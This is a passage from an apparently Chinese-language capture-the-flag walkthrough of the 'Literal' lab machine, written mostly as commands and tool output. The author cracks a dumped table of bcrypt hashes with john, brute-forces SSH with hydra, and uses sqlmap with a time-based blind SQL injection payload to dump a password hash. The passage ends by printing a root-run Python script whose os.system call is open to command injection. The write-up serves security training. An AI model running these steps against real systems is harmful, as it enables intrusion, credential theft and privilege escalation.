$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m | 2023-04-07 17:21:48 |\n| 13 | kelsey | kelsey@without.you | $2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6. | 2023-04-07 17:21:48 |\n| 14 | jtx | jtx@tiempoaltiempo.hy | $2y$10$jN5dt8syJ5cVrlpotOXibeNC\/jvW0bn3z6FetbVU\/CeFtKwhdhslC | 2023-04-07 17:21:48 |\n| 15 | DRphil | DRphil@alcaldia-tol.gob | $2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC | 2023-04-07 17:21:48 |\n| 16 | carm3N | carm3N@estadodelarte.moc | $2y$10$D7uF6dKbRfv8U\/M\/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo\/.RnW | 2023-04-07 17:21:48 |\n| 17 | lanz | lanz@literal.htb | $2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So\/8IWLi4e69QqJrM8FZvAMf..e | 2023-04-07 17:55:36 |\n| 18 | kali | kali@kali.com | $2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1. | 2025-06-08 15:40:11 |\n+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+<\/code><\/pre>\n<\/div><\/p>\n\u8fd9\u91cc\u51c6\u5907\u7834\u8bd1\uff0c\u76f4\u63a5\u4e22\u7ed9ai\u8ba9\u4ed6\u5206\u79bb\u518d\u7ed9\u6211\u4eec\u5c31\u884c\u4e86\u3002\u3002\u3002\u3002\uff08\u9ad8\u7aef\u7684\u53a8\u5e08\u5f80\u5f80\u91c7\u7528\u6700\u6734\u7d20\u7684\u70f9\u996a\u65b9\u5f0f\uff09<\/p>\n
test:$2y$10$wWhvCz1pGsKm..jh\/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma\nadmin:$2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K\ncarols:$2y$10$ikI1dN\/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD\/.p.bh0w.bJBW\nfreddy123:$2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK\njorg3_M:$2y$10$lZ.\/Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG\naNdr3s1to:$2y$10$F2Eh43xkXR\/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi\/OBA6hm\nkitty:$2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW\nwalter:$2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO\nestefy:$2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa\nmichael:$2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km\nr1ch4rd:$2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO\nfel1x:$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m\nkelsey:$2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6.\njtx:$2y$10$jN5dt8syJ5cVrlpotOXibeNC\/jvW0bn3z6FetbVU\/CeFtKwhdhslC\nDRphil:$2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC\ncarm3N:$2y$10$D7uF6dKbRfv8U\/M\/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo\/.RnW\nlanz:$2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So\/8IWLi4e69QqJrM8FZvAMf..e\nkali:$2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1.<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32\/64 X3])\nCost 1 (iteration count) is 1024 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\n123456789 (freddy123) \nbutterfly (estefy) \nmonica (r1ch4rd) \nhellokitty (kitty) \n50cent (DRphil) \nslipknot (jorg3_M) \nmichael1 (michael) \n147258369 (fel1x) \nkelsey (kelsey) \n741852963 (walter)\nzxcvbnm,.\/ (jtx) <\/code><\/pre>\n\u8bb0\u5f55\u4e00\u4e0b\u5bc6\u7801\uff0c\u5e76\u5c1d\u8bd5\u8fdb\u884cssh\u8fde\u63a5\u3002\u8fd9\u91cc\u7528 AI \u7f16\u5199\u4e86\u4e00\u4e2a\u811a\u672c\u5c1d\u8bd5\u8fdb\u884c\u6838\u5bf9\uff1a<\/p>\n
# user\nfreddy123\nestefy\nr1ch4rd\nkitty\nDRphil\njorg3_M\nmichael\nfel1x\nkelsey\nwalter\njtx<\/code><\/pre>\n# pass\n123456789\nbutterfly\nmonica\nhellokitty\n50cent\nslipknot\nmichael1\n147258369\nkelsey\n741852963\nzxcvbnm,.\/<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u4f46\u662f\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ paste -d: user pass > cred\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ hydra -C cred ssh:\/\/192.168.10.107:22 -t 4 -vV -f \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-08 12:42:58\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 11 login tries, ~3 tries per task\n[DATA] attacking ssh:\/\/192.168.10.107:22\/\n[VERBOSE] Resolving addresses ... [VERBOSE] resolving done\n[INFO] Testing if password authentication is supported by ssh:\/\/freddy123@192.168.10.107:22\n[INFO] Successful, password authentication is supported by ssh:\/\/192.168.10.107:22\n[ATTEMPT] target 192.168.10.107 - login "freddy123" - pass "123456789" - 1 of 11 [child 0] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "estefy" - pass "butterfly" - 2 of 11 [child 1] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "r1ch4rd" - pass "monica" - 3 of 11 [child 2] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "kitty" - pass "hellokitty" - 4 of 11 [child 3] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "DRphil" - pass "50cent" - 5 of 11 [child 0] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "jorg3_M" - pass "slipknot" - 6 of 11 [child 1] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "michael" - pass "michael1" - 7 of 11 [child 3] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "fel1x" - pass "147258369" - 8 of 11 [child 2] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "kelsey" - pass "kelsey" - 9 of 11 [child 3] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "walter" - pass "741852963" - 10 of 11 [child 1] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "jtx" - pass "zxcvbnm,.\/" - 11 of 11 [child 0] (0\/0)\n[STATUS] attack finished for 192.168.10.107 (waiting for children to complete tests)\n1 of 1 target completed, 0 valid password found\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\n[ERROR] 1 target did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-08 12:43:07<\/code><\/pre>\n\u65b0\u6ce8\u5165\u70b9<\/h3>\n
\u6ce8\u610f\u5230\u524d\u9762\u7684\u90ae\u7bb1\u4e2d\u51fa\u73b0\u4e86\u4e00\u4e2a\u65b0\u7684dns\u89e3\u6790\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
192.168.10.107 forumtesting.literal.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u8bbf\u95ee\uff0c\u53d1\u73b0\u4f1a\u81ea\u52a8\u8fdb\u884c\u8df3\u8f6c\uff1a<\/p>\n
http:\/\/forumtesting.literal.hmv\/category.php<\/code><\/pre>\n\u53cd\u9988\u592a\u6162\uff0c\u603b\u662f\u5361\u6b7b\uff0c\u5c1d\u8bd5\u7ec8\u7aef\u8fdb\u884c\u6d4b\u8bd5\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ curl http:\/\/forumtesting.literal.hmv\/category.php\n<!DOCTYPE html>\n<html>\n<head>\n<meta http-equiv="Content-Type" content="text\/html; charset=utf-8" \/>\n<link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css">\n<link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap-theme.min.css">\n<script src="https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js"><\/script>\n<script src="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/js\/bootstrap.min.js"><\/script>\n<!-- jQuery -->\n<title>c4TLoUis forum<\/title> \n<link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css">\n<script src="https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js"><\/script>\n<script src="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/js\/bootstrap.min.js"><\/script>\n<link rel="stylesheet" href="css\/style.css">\n<\/head>\n<body class="">\n<div class="container" style="min-height:500px;">\n <div class="container">\n <div class="row">\n <h2>Discussion Forum | About... Imagination<\/h2>\n <h3><a href="category.php">Home<\/a> | <a href="login.php">Login<\/a> | <a href="cp_login.php">Control Panel<\/a><\/h3>\n\n <div class="single category">\n <ul class="list-unstyled">\n <li><span style="font-size:25px;font-weight:bold;">Categories<\/span> <span class="pull-right"><span style="font-size:20px;font-weight:bold;">Topics \/ Posts<\/span><\/span><\/li>\n <li><a href="category.php?category_id=2" title="">Forum details <span class="pull-right">0 \/ 0<\/span><\/a><\/li>\n <li><a href="category.php?category_id=1" title="">New things for the blog <span class="pull-right">0 \/ 0<\/span><\/a><\/li>\n <\/ul>\n <\/div>\n <\/div>\n<\/div>\n<div class="insert-post-ads1" style="margin-top:20px;">\n\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ curl http:\/\/forumtesting.literal.hmv\/category.php | html2text\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 1816 100 1816 0 0 24319 0 --:--:-- --:--:-- --:--:-- 24540\n***** Discussion Forum | About... Imagination *****\n**** Home | Login | Control Panel ****\n * Categories Topics \/ Posts\n * Forum details 0 \/ 0\n * New things for the blog 0 \/ 0\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ curl -s http:\/\/forumtesting.literal.hmv\/category.php | html2text\n***** Discussion Forum | About... Imagination *****\n**** Home | Login | Control Panel ****\n * Categories Topics \/ Posts\n * Forum details 0 \/ 0\n * New things for the blog 0 \/ 0<\/code><\/pre>\n\u53d1\u73b0\u51fa\u73b0\u4e86\u53ef\u80fd\u5b58\u5728sql\u6ce8\u5165\u7684\u70b9\uff1acategory.php?category_id=2<\/code>\uff0c\u8fdb\u884csqlmap\u6d4b\u8bd5\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch --dbs \n ___\n __H__\n ___ ___[']_____ ___ ___ {1.9.2#stable}\n|_ -| . ['] | .'| . |\n|___|_ ["]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:55:58 \/2025-06-08\/\n\n[12:55:58] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=82oqekh0oed...3bdp26e439'). Do you want to use those [Y\/n] Y\n[12:55:58] [INFO] testing if the target URL content is stable\n[12:55:58] [INFO] target URL content is stable\n[12:55:58] [INFO] testing if GET parameter 'category_id' is dynamic\n[12:55:58] [INFO] GET parameter 'category_id' appears to be dynamic\n[12:55:58] [WARNING] heuristic (basic) test shows that GET parameter 'category_id' might not be injectable\n[12:55:58] [INFO] testing for SQL injection on GET parameter 'category_id'\n[12:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:55:59] [WARNING] reflective value(s) found and filtering out\n[12:55:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\n[12:55:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'\n[12:55:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'\n[12:55:59] [INFO] testing 'Microsoft SQL Server\/Sybase AND error-based - WHERE or HAVING clause (IN)'\n[12:55:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'\n[12:55:59] [INFO] testing 'Generic inline queries'\n[12:55:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'\n[12:55:59] [INFO] testing 'Microsoft SQL Server\/Sybase stacked queries (comment)'\n[12:55:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'\n[12:55:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:56:19] [INFO] GET parameter 'category_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable \nit looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y\/n] Y\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y\/n] Y\n[12:56:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:56:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:56:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:56:19] [INFO] target URL appears to have 1 column in query\ndo you want to (re)try to find proper UNION column types with fuzzy test? [y\/N] N\n[12:56:19] [WARNING] if UNION based SQL injection is not detected, please consider and\/or try to force the back-end DBMS (e.g. '--dbms=mysql') \n[12:56:19] [INFO] target URL appears to be UNION injectable with 1 columns\n[12:56:19] [INFO] checking if the injection point on GET parameter 'category_id' is a false positive\nGET parameter 'category_id' is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N\nsqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:\n---\nParameter: category_id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)\n---\n[12:56:59] [INFO] the back-end DBMS is MySQL\n[12:56:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \nweb server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)\nweb application technology: Apache 2.4.41, PHP\nback-end DBMS: MySQL >= 5.0.12\n[12:57:00] [INFO] fetching database names\n[12:57:00] [INFO] fetching number of databases\n[12:57:00] [INFO] retrieved: \ndo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y\/n] Y\n[12:57:30] [INFO] adjusting time delay to 1 second due to good response times\n3\n[12:57:30] [INFO] retrieved: in^C\n[12:57:45] [WARNING] HTTP error codes detected during run:\n500 (Internal Server Error) - 72 times<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u5ef6\u65f6\u6ce8\u5165\u6f0f\u6d1e\uff0c\u770b\u6765\u8fd9\u4e2a\u9776\u673a\u662f\u8bad\u7ec3sql\u6ce8\u5165\u7684\uff0c\u53ef\u60dc\u4e86\uff0c\u56de\u5934\u8865\u56de\u6765\u5427\u3002\u3002\u3002\u592a\u6162\u4e86\uff0c\u7ecf\u8fc7\u6f2b\u957f\u7684\u6d4b\u8bd5\u62ff\u5230\u4e86\u4e00\u4e2a\u51ed\u8bc1\uff1a<\/p>\n
# sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch --dbs\n# information_schema\n# performance_schema\n# forumtesting\n\n# sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch -D forumtesting --tables\n# forum_category\n# forum_owner\n# forum_posts\n# forum_topics\n# forum_users\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch -D forumtesting -T forum_owner --dump\n ___\n __H__\n ___ ___["]_____ ___ ___ {1.9.2#stable}\n|_ -| . [(] | .'| . |\n|___|_ ["]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 13:24:22 \/2025-06-08\/\n\n[13:24:22] [INFO] resuming back-end DBMS 'mysql' \n[13:24:22] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=cldac0c27tr...9f43f8ihi7'). Do you want to use those [Y\/n] Y\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: category_id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)\n---\n[13:24:22] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)\nweb application technology: Apache 2.4.41, PHP\nback-end DBMS: MySQL >= 5.0.12\n[13:24:22] [INFO] fetching columns for table 'forum_owner' in database 'forumtesting'\n[13:24:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done) \ndo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y\/n] Y\n[13:24:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \n5\n[13:24:43] [INFO] retrieved: \n[13:24:53] [INFO] adjusting time delay to 1 second due to good response times\ncreated\n[13:25:27] [INFO] retrieved: email\n[13:25:53] [INFO] retrieved: id\n[13:26:06] [INFO] retrieved: password\n[13:27:00] [INFO] retrieved: username\n[13:27:45] [INFO] fetching entries for table 'forum_owner' in database 'forumtesting'\n[13:27:45] [INFO] fetching number of entries for table 'forum_owner' in database 'forumtesting'\n[13:27:45] [INFO] retrieved: 1\n[13:27:47] [WARNING] reflective value(s) found and filtering out of statistical model, please wait \n.............................. (done)\n2022-02-12\n[13:28:46] [INFO] retrieved: carlos@forumtesting.literal.htb\n[13:32:11] [INFO] retrieved: 1\n[13:32:16] [INFO] retrieved: 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99\n[13:46:13] [INFO] retrieved: carlos\n[13:46:49] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y\/N] N\ndo you want to crack them via a dictionary-based attack? [Y\/n\/q] Y\n[13:46:49] [INFO] using hash method 'sha512_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file '\/usr\/share\/sqlmap\/data\/txt\/wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> 1\n[13:46:49] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y\/N] N\n[13:46:49] [INFO] starting dictionary-based cracking (sha512_generic_passwd)\n[13:46:49] [INFO] starting 2 processes \n[13:47:11] [WARNING] no clear password(s) found \nDatabase: forumtesting\nTable: forum_owner\n[1 entry]\n+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+\n| id | email | created | password | username |\n+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+\n| 1 | carlos@forumtesting.literal.htb | 2022-02-12 | 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99 | carlos |\n+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+\n\n[13:47:11] [INFO] table 'forumtesting.forum_owner' dumped to CSV file '\/home\/kali\/.local\/share\/sqlmap\/output\/forumtesting.literal.hmv\/dump\/forumtesting\/forum_owner.csv'\n[13:47:11] [INFO] fetched data logged to text files under '\/home\/kali\/.local\/share\/sqlmap\/output\/forumtesting.literal.hmv'\n\n[*] ending @ 13:47:11 \/2025-06-08\/<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
<\/div><\/p>\ncarlos:forum100889<\/code><\/pre>\n\u4f46\u662f\u767b\u5f55\u5931\u8d25\u4e86\uff0c\u8fd9\u91cc\u4f5c\u8005\u610f\u601d\u662f\u521a\u521a\u7b2c\u4e8c\u4e2asql\u6ce8\u5165\u754c\u9762\u662f\u4e00\u4e2a\u8bba\u575b\uff0c\u8bba\u575b\u540d\u5b57\u4e3aforumtesting<\/code>\uff0c\u793e\u4f1a\u5de5\u7a0b\u5b66\u6765\u770b\u4ed6\u5bc6\u7801\u53d6\u4e3aforum100889<\/code>\u662f\u56e0\u4e3a\u5bf9\u5e94\u7740\u5e73\u53f0\u524d\u4e94\u4f4d\u4ee5\u53ca\u6570\u5b57\uff0c\u6240\u4ee5\u4ed6\u7684ssh\u5bc6\u7801\u53ef\u80fd\u4e3assh100889<\/code>\uff0c\u786e\u5b9e\u9700\u8981\u4e00\u70b9\u8111\u6d1e\u7684\u3002\u3002\u3002\u3002<\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ncarlos@literal:~$ whoami;id\ncarlos\nuid=1000(carlos) gid=1000(carlos) groups=1000(carlos)\ncarlos@literal:~$ ls -la\ntotal 44\ndrwxr-xr-x 7 carlos carlos 4096 Apr 8 2023 .\ndrwxr-xr-x 3 root root 4096 Jun 15 2022 ..\nlrwxrwxrwx 1 root root 9 Feb 12 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 carlos carlos 220 Feb 25 2020 .bash_logout\n-rw-r--r-- 1 carlos carlos 3771 Feb 25 2020 .bashrc\ndrwx------ 2 carlos carlos 4096 Jun 21 2022 .cache\ndrwx------ 3 carlos carlos 4096 Jun 22 2022 .gnupg\ndrwxrwxr-x 3 carlos carlos 4096 Feb 12 2021 .local\ndrwxrwxr-x 2 carlos carlos 4096 Jun 21 2022 my_things\n-rw-r--r-- 1 carlos carlos 807 Feb 25 2020 .profile\ndrwx------ 2 carlos carlos 4096 Sep 20 2021 .ssh\n-rw-r----- 1 root carlos 33 Feb 13 2021 user.txt\ncarlos@literal:~$ cd my_things\/\ncarlos@literal:~\/my_things$ ls -la\ntotal 12\ndrwxrwxr-x 2 carlos carlos 4096 Jun 21 2022 .\ndrwxr-xr-x 7 carlos carlos 4096 Apr 8 2023 ..\n-rw-rw-r-- 1 carlos carlos 226 Jun 8 17:36 detalles.txt\ncarlos@literal:~\/my_things$ cat detalles.txt \nTo check one day.\n\nBlog ----:\n> Blog colors.\n> Validate syntax and coherence.\n> Buttom to translate blog to Spanish.\n> Check task on both blog and forum.\n\nForum ---:\n> Delete default posts.\n> Create custom responses to mails.\ncarlos@literal:~\/my_things$ crontab -l\nno crontab for carlos\ncarlos@literal:~\/my_things$ cd ..\ncarlos@literal:~$ cat user.txt \n6d3c8a6c73cf4f89eea7ae57f6eb9222\ncarlos@literal:~$ sudo -l\nMatching Defaults entries for carlos on literal:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser carlos may run the following commands on literal:\n (root) NOPASSWD: \/opt\/my_things\/blog\/update_project_status.py *<\/code><\/pre>\n\u627e\u5230\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n
#!\/usr\/bin\/python3\n\n# Learning python3 to update my project status\n## (mental note: This is important, so administrator is my safe to avoid upgrading records by mistake) :P\n\n'''\nReferences:\n* MySQL commands in Linux: https:\/\/www.shellhacks.com\/mysql-run-query-bash-script-linux-command-line\/\n* Shell commands in Python: https:\/\/stackabuse.com\/executing-shell-commands-with-python\/\n* Functions: https:\/\/www.tutorialspoint.com\/python3\/python_functions.htm\n* Arguments: https:\/\/www.knowledgehut.com\/blog\/programming\/sys-argv-python-examples\n* Array validation: https:\/\/stackoverflow.com\/questions\/7571635\/fastest-way-to-check-if-a-value-exists-in-a-list\n* Valid if root is running the script: https:\/\/stackoverflow.com\/questions\/2806897\/what-is-the-best-way-for-checking-if-the-user-of-a-script-has-root-like-privileg\n'''\n\nimport os\nimport sys\nfrom datetime import date\n\n# Functions ------------------------------------------------.\ndef execute_query(sql):\n os.system("mysql -u " + db_user + " -D " + db_name + " -e \\"" + sql + "\\"")\n\n# Query all rows\ndef query_all():\n sql = "SELECT * FROM projects;"\n execute_query(sql)\n\n# Query row by ID\ndef query_by_id(arg_project_id):\n sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"\n execute_query(sql)\n\n# Update database\ndef update_status(enddate, arg_project_id, arg_project_status):\n if enddate != 0:\n sql = f"UPDATE projects SET prodateend = '" + str(enddate) + "', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"\n else:\n sql = f"UPDATE projects SET prodateend = '2222-12-12', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"\n\n execute_query(sql)\n\n# Main program\ndef main():\n # Fast validation\n try:\n arg_project_id = sys.argv[1]\n except:\n arg_project_id = ""\n\n try:\n arg_project_status = sys.argv[2]\n except:\n arg_project_status = ""\n\n if arg_project_id and arg_project_status: # To update\n # Avoid update by error\n if os.geteuid() == 0:\n array_status = ["Done", "Doing", "To do"]\n if arg_project_status in array_status:\n print("[+] Before update project (" + arg_project_id + ")\\n")\n query_by_id(arg_project_id)\n\n if arg_project_status == 'Done':\n update_status(date.today(), arg_project_id, arg_project_status)\n else:\n update_status(0, arg_project_id, arg_project_status)\n else:\n print("Bro, avoid a fail: Done - Doing - To do")\n exit(1)\n\n print("\\n[+] New status of project (" + arg_project_id + ")\\n")\n query_by_id(arg_project_id)\n else:\n print("Ejejeeey, avoid mistakes!")\n exit(1)\n\n elif arg_project_id:\n query_by_id(arg_project_id)\n else:\n query_all()\n\n# Variables ------------------------------------------------.\ndb_user = "carlos"\ndb_name = "blog"\n\n# Main program\nmain()<\/code><\/pre>\n\u6ce8\u610f\u5230execute_query<\/code>\u76f4\u63a5\u6267\u884c\u62fc\u63a5\u8d77\u6765\u7684\u547d\u4ee4\uff0c\u5c1d\u8bd5\u95ed\u5408sql\u8bed\u53e5\u62fc\u63a5\u8fdb\u53bb\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| proid | proname | prodatecreated | prodateend | prostatus |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| 1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done |\n| 2 | Ascii Art Python - Show logos only with letter A | 2021-09-20 18:06:22 | 2222-12-12 | To do |\n| 3 | Ascii Art Bash - Show musical stores (WTF) | 2021-09-20 18:06:50 | 2222-12-12 | To do |\n| 4 | Forum - Add that people can send me bug reports of projects | 2023-04-07 17:40:41 | 2023-11-01 | Doing |\n| 5 | Validate syntax errors on blog pages | 2021-09-20 18:07:43 | 2222-12-12 | Doing |\n| 6 | Script to extract info from files and upload it to any DB | 2021-09-20 18:07:58 | 2222-12-12 | Doing |\n| 7 | Forum - Implement forum form | 2023-04-07 17:46:38 | 2023-11-01 | Doing |\n| 8 | Add that people can create their own projects on DB | 2021-09-20 18:49:52 | 2222-12-12 | To do |\n| 9 | Ascii Art C - Start learning Ascii Art with C | 2021-09-20 18:50:02 | 2222-12-12 | To do |\n| 10 | Ascii Art Bash - Welcome banner preview in blog home | 2021-09-20 18:50:08 | 2222-12-12 | To do |\n| 11 | Blog - Create login and register form | 2023-04-07 17:40:28 | 2023-08-21 | Done |\n| 12 | Blog - Improve the appearance of the dashboard\/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing 